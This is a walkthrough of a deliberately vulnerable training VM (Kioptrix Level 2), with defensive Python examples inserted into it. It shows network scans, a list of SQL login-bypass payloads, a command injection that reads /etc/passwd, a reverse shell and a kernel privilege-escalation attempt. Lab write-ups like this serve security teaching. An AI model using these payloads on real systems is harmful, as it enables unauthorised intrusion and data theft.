I'm busy these days with the Myanmar Cyber Security Challenge 2018 (CTF), but I'll try to write up the walkthrough of this challenge VM. OK, let's try to exploit the box.
The first step is to find the target IP on the network; I use an nmap ping scan.
┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:17 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.72
Host is up (0.00023s latency).
MAC Address: 00:0C:29:F7:CC:C7 (VMware)
Nmap scan report for 192.168.1.78
Host is up (0.00018s latency).
MAC Address: 08:00:27:CA:D9:CE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.100
Host is up (0.00019s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds
The target IP is 192.168.1.72, so I run a service scan against it.
┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.72

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:20 +0630
Nmap scan report for 192.168.1.72
Host is up (0.0020s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
666/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:F7:CC:C7 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
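A service scan like the one above is also the starting point of a defender's exposure review. The following is an added example (not part of the original post) that parses the service lines of that nmap -sV output into records and flags the findings a reviewer would raise from the version column alone: the "protocol 1.99" banner means the SSH daemon still accepts the legacy SSH-1 protocol alongside SSH-2, and the RPC, CUPS and MySQL listeners are reachable from the network. The sample text is copied from the scan above; the rule set is my own and makes no claim about specific CVEs.

```python
import re

# Sample input constructed from the service lines of the scan above.
SAMPLE_NMAP = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
666/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
"""

# One nmap port line: "<port>/<proto> <state> <service> <version text...>"
_PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(text):
    """Turn nmap -sV port lines into dicts; header and banner lines are skipped."""
    services = []
    for line in text.splitlines():
        m = _PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        services.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": version.strip(),
        })
    return services


def findings(services):
    """Return (port, note) pairs for exposures a reviewer would raise."""
    out = []
    for s in services:
        if s["state"] != "open":
            continue
        if s["service"] == "ssh" and re.search(r"protocol 1(\.99)?\b", s["version"]):
            # 1.99 is the banner value a server uses when it speaks both
            # SSH-1 and SSH-2; SSH-1 should be disabled outright.
            out.append((s["port"], "SSH-1 still enabled (banner 'protocol 1.99'); allow protocol 2 only"))
        elif s["service"] in ("rpcbind", "status"):
            out.append((s["port"], "RPC portmapper/status exposed; filter unless NFS/NIS is in use"))
        elif s["service"] == "ipp":
            out.append((s["port"], "CUPS listening on the network; bind it to localhost"))
        elif s["service"] == "mysql":
            # '(unauthorized)' means the probe was refused by MySQL's grant
            # tables, but the port is still reachable; bind to localhost.
            out.append((s["port"], "MySQL reachable from the network; bind to 127.0.0.1 or firewall it"))
    return out


if __name__ == "__main__":
    for port, note in findings(parse_services(SAMPLE_NMAP)):
        print(f"{port:>5}  {note}")
```

The parser keys on nmap's normal (human-readable) output only because that is what the post shows; for automation, `nmap -oX` and an XML parser are the more robust route.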
Yes. I explore port 80 first and run dirb to find directory paths. I find a Remote Admin login form on the index page. Checking the page source, I notice this HTML comment:
<!-- Start of HTML when logged in as Administator -->
So the username must be Administator. I try to log in first, so let me test some SQL login bypass queries.
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
Yes, the login bypass succeeds with the payload below, and I find a ping form in the admin panel.
' or '1'='1
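Why that payload works, and what closes the hole, is easiest to see side by side. The following is an added example (not code from the original post or from the Kioptrix VM): a constructed SQLite user table, a login check that concatenates the submitted values into the query the way the admin panel evidently does, and the same check with bound parameters. The table name, column names and the placeholder password are my assumptions.

```python
import sqlite3

PAYLOAD = "' or '1'='1"


def make_db():
    """Constructed in-memory stand-in for the admin panel's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Placeholder credentials; a real application would store a password hash.
    conn.execute("INSERT INTO users VALUES ('Administator', 'placeholder-secret')")
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: the submitted text becomes part of the SQL grammar."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_safe(conn, username, password):
    """Bound parameters: the submitted text is only ever compared as a value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


def demo():
    """Run both checks against the same payload and return the outcomes."""
    conn = make_db()
    return {
        # WHERE username = 'Administator' AND password = '' or '1'='1'
        # -> (false) OR (true): every row qualifies, the first one is returned.
        "vulnerable_bypassed": login_vulnerable(conn, "Administator", PAYLOAD),
        # The same text is compared literally against the password column.
        "safe_bypassed": login_safe(conn, "Administator", PAYLOAD),
        # The parameterised version still works for the genuine credentials.
        "safe_real_creds": login_safe(conn, "Administator", "placeholder-secret"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query("Administator", PAYLOAD))
    print(demo())
```

The rendered query printed by the block shows the operator precedence at work: `AND` binds tighter than `OR`, so the injected `'1'='1'` is a top-level disjunct that makes the whole predicate true regardless of the password.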
I try to exploit the ping form with command injection: www.google.com;cat /etc/passwd
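The ping form is vulnerable because the submitted host is pasted into a shell command line, so the `;` ends `ping` and starts a second command. The following is an added example (not code from the original post or from the VM) showing the difference between that pattern and a hardened handler: the target is validated against the hostname/IP grammar before use, and the command is built as an argument vector with no shell involved. The function names are my own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: letters, digits and hyphens, not starting or
# ending with a hyphen, at most 63 characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def is_valid_target(host: str) -> bool:
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname, nothing else."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    # fullmatch: shell metacharacters (; | & $ ` whitespace, newlines) never match.
    return _HOSTNAME_RE.fullmatch(host) is not None


def vulnerable_ping_command(host: str) -> str:
    """The pattern behind the page's ping form: user text spliced into a shell line."""
    return "ping -c 1 " + host


def safe_ping_argv(host: str) -> list:
    """Validate first, then pass the host as one argv element (no shell parsing)."""
    if not is_valid_target(host):
        raise ValueError("invalid ping target: %r" % (host,))
    # Labels cannot start with '-', so the host can never be read as an option.
    return ["ping", "-c", "1", host]


def safe_ping(host: str) -> str:
    """Run ping without a shell; returns its stdout. Needs a network to be useful."""
    argv = safe_ping_argv(host)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False)
    return result.stdout


if __name__ == "__main__":
    injected = "www.google.com;cat /etc/passwd"
    print("shell string:", vulnerable_ping_command(injected))   # two commands
    print("valid?       ", is_valid_target(injected))             # False
    print("argv:        ", safe_ping_argv("www.google.com"))
```

`subprocess.run` with a list and the default `shell=False` hands the arguments straight to `execve`, so even if validation were skipped the `;` would reach `ping` as part of a single (unresolvable) hostname rather than reaching a shell; the allow-list is still worth keeping, because it turns a silent ping failure into a rejected request that can be logged.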
─[✗]─[[email protected]]─[~]
└──> dirb http://192.168.1.72 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jan 6 13:22:10 2018
URL_BASE: http://192.168.1.72/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.72/ ----
+ http://192.168.1.72/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.1.72/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.1.72/manual/
+ http://192.168.1.72/usage (CODE:403|SIZE:285)

-----------------
END_TIME: Sat Jan 6 13:22:19 2018
DOWNLOADED: 4612 - FOUND: 3
HTTPS gives the same results. OK, so I use the command injection to get a reverse shell back to my machine with netcat.
I search on Google to find out whether this kernel version is vulnerable.
Then download the exploit and root it!
https://www.exploit-db.com/exploits/1397/
But it does not work:
bash-3.00$ gcc Laiwon.c -o loveme
Laiwon.c:730:28: warning: no newline at end of file
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ ./loveme

[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ]
[ Discovered Jan 2005 by sd <[email protected]> ]
[ Modified 2005/9 by alert7 <[email protected]> ]

[+] try open /proc/cpuinfo .. ok!!
[+] find cpu flag pse in /proc/cpuinfo
[+] CONFIG_X86_PAE :none
[+] Cpu flag: pse ok
[+] Exploit Way : 0
[+] Use 1 pages (one page is 4K ),rewrite 0xc0000000--(0xc0001000 + n)
[+] thread_size 0 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
epoll_wait: Invalid argument
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
[+] idtr.base 0xc03fd000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbfedbe30,num 4100
[-] This kernel not vulnerability!!!
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
On to the next exploit! 😉 After it succeeds I have a root shell and look around in /var/spool/mail:
sh-3.00# cd mail
cd mail
sh-3.00# ls -al
ls -al
total 24
drwxrwxr-x   2 root   mail 4096 Jan  5 18:55 .
drwxr-xr-x  14 root   root 4096 Oct  7  2009 ..
-rw-rw----   1 harold mail    0 Oct 12  2009 harold
-rw-rw----   1 john   mail    0 Oct  8  2009 john
-rw-------   1 root   root 4351 Jan  5 18:55 root
sh-3.00# cat root
cat root
From [email protected] Fri Jan 5 18:55:42 2018
Return-Path: <[email protected]>
Received: from localhost (localhost)
 by kioptrix.level2 (8.13.1/8.13.1) id w05Ntf9C002820;
 Fri, 5 Jan 2018 18:55:41 -0500
Date: Fri, 5 Jan 2018 18:55:41 -0500
From: Mail Delivery Subsystem <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
 boundary="w05Ntf9C002820.1515196541/kioptrix.level2"
Subject: Postmaster notify: see transcript for details
Auto-Submitted: auto-generated (postmaster-notification)

This is a MIME-encapsulated message

--w05Ntf9C002820.1515196541/kioptrix.level2

The original message was received at Thu, 9 Feb 2012 22:39:59 -0500
from localhost
with id q1A3dxnO003116

   ----- The following addresses had permanent fatal errors -----
<[email protected]>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue

--w05Ntf9C002820.1515196541/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Thu, 9 Feb 2012 22:39:59 -0500

Final-Recipient: RFC822; [email protected]
Action: failed
Status: 4.4.7
Last-Attempt-Date: Fri, 5 Jan 2018 18:55:41 -0500

--w05Ntf9C002820.1515196541/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
 by kioptrix.level2 (8.13.1/8.13.1) id q1A3dxnO003116;
 Thu, 9 Feb 2012 22:39:59 -0500
Date: Thu, 9 Feb 2012 22:39:59 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON>
Message-Id: <[email protected]>
To: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
 boundary="q1A3dxnO003116.1328845199/kioptrix.level2"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--q1A3dxnO003116.1328845199/kioptrix.level2

The original message was received at Mon, 12 Oct 2009 04:02:04 -0500
from localhost.localdomain [127.0.0.1]

   ----- The following addresses had permanent fatal errors -----
<[email protected]>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue
451 kioptrix.level2: Name server timeout

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Mon, 12 Oct 2009 04:02:04 -0500

Final-Recipient: RFC822; [email protected]
Action: failed
Status: 4.4.7
Last-Attempt-Date: Thu, 9 Feb 2012 22:39:59 -0500

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <[email protected]>
Received: from kioptrix.level2 (localhost.localdomain [127.0.0.1])
 by kioptrix.level2 (8.13.1/8.13.1) with ESMTP id n9C824DR003890
 for <[email protected]>; Mon, 12 Oct 2009 04:02:04 -0400
Received: (from [email protected]ost)
 by kioptrix.level2 (8.13.1/8.13.1/Submit) id n9C824Nj003888
 for root; Mon, 12 Oct 2009 04:02:04 -0400
Date: Mon, 12 Oct 2009 04:02:04 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: LogWatch for kioptrix.level2

 ################### LogWatch 5.2.2 (06/23/04) ####################
       Processing Initiated: Mon Oct 12 04:02:04 2009
       Date Range Processed: yesterday
     Detail Level of Output: 0
          Logfiles for Host: kioptrix.level2
 ################################################################

 --------------------- SSHD Begin ------------------------

 SSHD Killed: 1 Time(s)

 ---------------------- SSHD End -------------------------

 ------------------ Disk Space --------------------
/dev/mapper/VolGroup00-LogVol00  3.3G  1.5G  1.7G  47% /
/dev/hda1                         99M  9.3M   85M  10% /boot

 ###################### LogWatch End #########################

--q1A3dxnO003116.1328845199/kioptrix.level2--

--w05Ntf9C002820.1515196541/kioptrix.level2--
WooT... and we get root's email.
Thanks for reading. Happy Hacking! 😉